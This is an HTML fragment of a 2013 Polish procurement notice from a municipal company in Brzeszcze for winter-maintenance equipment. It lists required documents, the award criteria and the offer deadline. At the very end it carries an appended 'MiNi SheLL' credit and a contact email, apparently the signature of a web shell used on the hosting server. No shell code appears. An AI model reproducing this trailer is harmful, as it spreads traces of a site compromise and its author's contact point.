</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Deklaracji CE dla urządzenia bramowego, posypywarko- solarki, pługa odśnieżnego.
	Aktualnych badań Dozoru technicznego urządzenia bramowego.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany zapisów umowy w zakresie wynagrodzenia umownego w przypadku zmiany obowiązującej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ak.brzeszcze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Komunalna Sp. z o.o.
ul Kościelna 7
32-620 Brzeszcze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2013 godzina 09:00, miejsce: Agencja Komunalna Sp. z o.o.
ul Kościelna 7
32-620 Brzeszcze
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com